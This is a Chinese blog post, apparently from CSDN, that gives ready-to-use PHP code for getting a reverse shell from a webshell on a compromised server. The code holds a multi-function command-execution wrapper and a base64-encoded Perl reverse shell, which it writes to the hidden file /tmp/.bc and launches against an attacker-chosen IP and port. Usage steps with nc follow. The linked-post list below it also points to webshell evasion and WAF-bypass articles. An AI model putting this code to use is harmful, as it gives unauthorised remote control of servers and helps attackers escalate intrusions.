php反弹,PHP Webshell 下的端口反弹方法

最新推荐文章于 2021-07-24 22:39:33 发布
最新推荐文章于 2021-07-24 22:39:33 发布
阅读量319 收藏
点赞数
文章标签: php反弹

使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。

测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。

7ecab5a5172cf2f1ceaac72674ee28d8.png

1175db97944b5d71518f6c09ffeb8f90.png

这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码

复制代码代码如下:

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "your IP";

$yourport = 'your port';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

侯明昊Neo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP WebShell 免杀
悦分享
08-01 5521
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
Php shell端口反弹,Linux下通过webshell反弹shell总结
weixin_33253503的博客
03-12 401
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...
php反弹,php反弹shell实现代码
weixin_42467428的博客
03-10 471
非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然...
php大马如何使用nc反弹提权,使用NC反弹Shell
weixin_39913628的博客
03-13 368
今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!使用NC反弹Shell在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdShell时,首先...
webshell反弹shell使用详解
有勇气的牛排博客
07-24 1567
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
php通过web调用shell,php webshell下直接反弹shell(不借助任何其他语言)
weixin_31755771的博客
03-10 658
linux下,有时候拿到webshell需要提权,提权必须要得到一个交互式的shell。我看了一下常用的php webshell,对于命令执行、反弹shell都没有完善的方式。很多webshell里都没有proc_popen、popen这两种方式,特别是proc_popen,比如phpspy。在我收集的反弹shell集合(http://tool.p1ng.pw/getshell.html)中,有一...
php webshell原理,php webshell分析和绕过waf原理解析
weixin_31913557的博客
03-27 745
本文讲述的是phpwebshell分析和绕过waf的原理解析,旨在服务社会,供安全研究人员学习使用,请勿用于其他非法用途,违者后果自负。WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitat...
php如何反弹shell,Linux_Linux下通过WebShell反弹CmdLine Shell小技巧, (昨天又不小心搜到篇自己 - phpStudy...
weixin_32769015的博客
03-19 136
Linux下通过WebShell反弹CmdLine Shell小技巧(昨天又不小心搜到篇自己以前写的文章,转了很多地方,没见一个写版权的)昨晚(应该是今天凌晨)玩了半天朋友给的Linux的WebShell,本来想实践一下UDEV提权呢,最后发现服务器貌似已经打过补丁了。不过还是有其他的收获的,所以我就YY下Linux反弹shell的问题。Linux提权绝大部分都靠的是Local Exploit。W...
PHP常见过waf webshell以及最简单的检测方法
01-20
之前在Webshell查杀的新思路中留了一个坑 ,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF的方法,以此来验证下此方法是否合理。 如有错误,还请...
wso_webshell_php_
10-01
Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的"Webshell",暗示了这个压缩包可能包含了一系列不同版本的Webshell工具,具体来说,是WSO(Web Shell...
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
PHP使用流包装器实现WebShell方法
10-18
PHP使用流包装器实现WebShell方法】 在Web安全领域,WebShell的构造与查杀是重要的议题。本文将探讨一种新型的WebShell生成方法,它利用PHP的流包装器,具有较高的隐蔽性,能够避开一些安全软件的检测。这种...
php木马webshell扫描器代码
12-18
PHP木马WebShell扫描器代码详解】 在网络安全领域,WebShell是指黑客植入目标服务器的后门程序,通常用于远程控制被黑站点。PHP作为Web开发的常用语言,常常成为WebShell的载体。为了保护服务器安全,开发者需要...
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
07-13
从0到场均50万GMV,鞋服品牌的视频号直播打法3. 直播场次报表.xlsx
Java语言基础入门教程 Java开发编程基础课程 第6章 字符串 共30页.pptx
07-13
【课程大纲】 第1、2、3章 Java简介 共15页.pptx 第4章 流程控制 共14页.pptx 第5章 数组 共8页.pptx 第6章 字符串 共30页.pptx 第7章 定义类 共10页.pptx 第8章 内部类和异常处理 共18页.pptx 第8章 生成对象 共18页.pptx 第9章 类的高级特性 共12页.pptx 第9章 深度了解变量和方法 共13页.pptx 第10章 理解包 共18页.pptx 第11章 继承、多态和接口 共21页.pptx 第12章 内部类和异常处理 共18页.pptx 第13章 图形用户界面 共31页.pptx 第14章 线程 共22页.pptx
大学生创业计划书(26)三篇文件.docx
07-14
大学生创业计划书(26)三篇文件.docx
mipi-UniPro-specification-v2-0 pdf
最新发布
07-14
mipi_UniPro_specification_v2-0 协议
IMC面试葵花宝典.docx
07-13
呼叫建立流程(白话版) 1.首先主叫 UE 附着至 eNB 2.建立 RRC 连接 3.主叫发起服务请求,建立 ERAB 承载(QCI5) 4.在主叫用户的默认承载完全建立后,主叫发起 SIP 呼叫(首先是 Register 信令),PGW 与 PCC 通过 DPI 检测出业务流中含高优先级的语音业务(因为数据流中含 SIP 协议)。则发起专用承载建立过程。 5.专用承载建立成功,PGW 与 UE 之间将这路 SDF 转移到这个专用承载上。 6.PGW 将带 SIP 呼叫的 IP 发出去,这个业务流会被转给 IMS 网络,然后就是 IMS 的注册流程,之间有四条 SIP 信令(主叫与 IMS 核心网之间),在主叫侧 EPS 网络中是在专用承载上传递的。 7.主叫用户呼被叫,用 SIP invite,这个信令在主叫侧 EPS 中也是在专用承载上传递的。IMS 网络会把呼叫信令路由到被叫侧 EPS 网络,即寻呼被叫使被叫 UE 与 PGW 之间建立专用承载(PGW 也有 DPI 检测的过程), 8.在被叫侧专用承载建立完成后,SIP 呼叫信令在主叫侧、IMS 核心网、被叫侧
php马-bypass _ alin'Blog1
08-03
本文主要关注的是如何绕过现有的PHP Webshell检测工具和平台,以实现更隐蔽的PHP Webshell,即“零提示、无警告、无法被检测到的一句话木马后门”。 首先,我们要了解Webshell的基本概念。Webshell,又称为网站后门...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值